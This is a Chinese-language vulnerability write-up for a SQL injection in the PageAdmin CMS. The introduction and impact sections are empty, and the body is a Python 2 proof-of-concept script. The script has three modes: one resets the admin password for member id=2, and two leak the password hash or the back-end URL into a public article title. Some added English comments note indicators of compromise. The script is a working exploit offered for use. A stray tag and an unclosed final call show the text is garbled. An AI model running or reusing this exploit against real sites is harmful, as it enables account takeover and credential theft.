        PageMyAdmin sql注入漏洞
    =======================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    ### poc
    
        #!/usr/bin/env python
        # -*- coding: utf-8 -*-
    
    
        import urllib2
        import urllib
        import re
        import sys
    
        def main():
            """Dispatch one of the three request modes against the target named in argv.

            argv[1] is the site base URL, argv[2] selects the mode. Nothing is
            validated: a missing argument raises IndexError, and argv[1] is used
            verbatim. All three modes POST the same form shape to the fixed path
            below, so from a defender's point of view the request to look for in
            web-server logs is a POST to ``/e/aspx/post.aspx`` whose ``thedata``
            field carries ``[u]``/``[k]``/``[s]`` tokens around table and column
            names (see the per-mode functions for the exact strings).
            """
            # Python 2 script (print statements, urllib2); it will not run unmodified on Python 3.
            url=sys.argv[1]+"/e/aspx/post.aspx"
            fun=sys.argv[2]
            if fun=='upass':
                update(url)
            elif fun=='sqlinject':
                sqlinject(url)
            elif fun=='Backstage':
                Backstage(url)
            else:
                # NOTE: the usage text lists "uppass" but the dispatch above matches "upass";
                # the string is left as-is since it is runtime output.
                print'''
                usage: pageadminsql.py http://www.baidu.com/ upass
                parameter: uppass sqlinject Backstage
                '''
        def update(url):
            """POST a ``thedata`` value that writes a fixed digest into ``pa_member.userpassword``.

            The ``thedata`` field is the injection vector: the bracketed tokens
            wrap a table name, an assignment and a where-clause, which the
            vulnerable endpoint evidently turns into an UPDATE. The digest is a
            40-hex-character constant; the success message claims it corresponds
            to ``admin_1234213`` — that mapping is not verified anywhere here.
            "Success" is judged purely on an HTTP 200, which does not prove the
            write took effect. For incident response, an unexplained change of
            ``pa_member.userpassword`` for ``id=2`` is the indicator of compromise.
            """
            # Referer is derived from the target URL itself; presumably the endpoint checks it.
            headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
            formate={
            "siteid":"1",
            "formtable":"1",
            "thedata":'[u][k]pa_member[k][s][k]userpassword="1527f10a11de5efea4b8516213413c103df55126"[k]where[k]id=2'
            }
            postdata = urllib.urlencode(formate)
            request = urllib2.Request(url, data=postdata, headers = headers)
            try:
                # No timeout is passed, so urlopen blocks indefinitely on an unresponsive host.
                response = urllib2.urlopen(request)
                if response.getcode()==200:
                    print u">>>>>>修改密码成功 修改密码:admin_1234213<<<<<<"
                    pass
            # Broad except: every failure (DNS, connection, HTTP error) collapses into
            # the same message and the exception object ``e`` is never used.
            except Exception as e:
                print u">>>>>>修改密码失败<<<<<<"
                pass
<doc_update>
        def sqlinject(url):
            """POST a ``thedata`` value that copies ``pa_member.userpassword`` into ``article.title``.

            Same vector as ``update``: the bracketed tokens name two tables, an
            assignment across them and a where-clause on ``article.id=747``. The
            effect is data exfiltration through a public page rather than a
            credential reset — the printed URL is where the overwritten title
            would be displayed. An HTTP 200 is the only "success" signal, so
            nothing here confirms the update happened. A sudden change of an
            article title to a hex string is the server-side symptom to alert on.
            """
            # Referer is derived from the target URL itself; presumably the endpoint checks it.
            headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
            formate={
            "siteid":"1",
            "formtable":"1",
            "thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747"
            }
            postdata = urllib.urlencode(formate)
            request = urllib2.Request(url, data=postdata, headers = headers)
            try:
                # No timeout is passed, so urlopen blocks indefinitely on an unresponsive host.
                response = urllib2.urlopen(request)
                if response.getcode()==200:
                    # The message re-reads argv[1] directly instead of deriving it from ``url``.
                    print u">>>>>>密码注入成功 查看密码地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
                    pass
            # Broad except: every failure collapses into one message; ``e`` is unused.
            except Exception as e:
                print u">>>>>>密码注入失败<<<<<<"
                pass
        def Backstage(url):
            """POST a ``thedata`` value that copies ``pa_log.url`` into ``article.title``.

            Structurally identical to ``sqlinject``; only the source column
            differs (``pa_log.url``, which the messages describe as the admin
            back-end address). As in the other modes, an HTTP 200 is the only
            "success" check and does not confirm the write. The same server-side
            symptom applies: article 747's title being replaced with a URL.
            """
            # Referer is derived from the target URL itself; presumably the endpoint checks it.
            headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
            formate={
            "siteid":"1",
            "formtable":"1",
            "thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747"
            }
            postdata = urllib.urlencode(formate)
            request = urllib2.Request(url, data=postdata, headers = headers)
            try:
                # No timeout is passed, so urlopen blocks indefinitely on an unresponsive host.
                response = urllib2.urlopen(request)
                if response.getcode()==200:
                    # The message re-reads argv[1] directly instead of deriving it from ``url``.
                    print u">>>>>>后台地址注入成功 查看后台地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
                    pass
            # Broad except: every failure collapses into one message; ``e`` is unused.
            except Exception as e:
                print u">>>>>>后台地址注入失败<<<<<<"
                pass
        if __name__ == '__main__':
            main(
    
    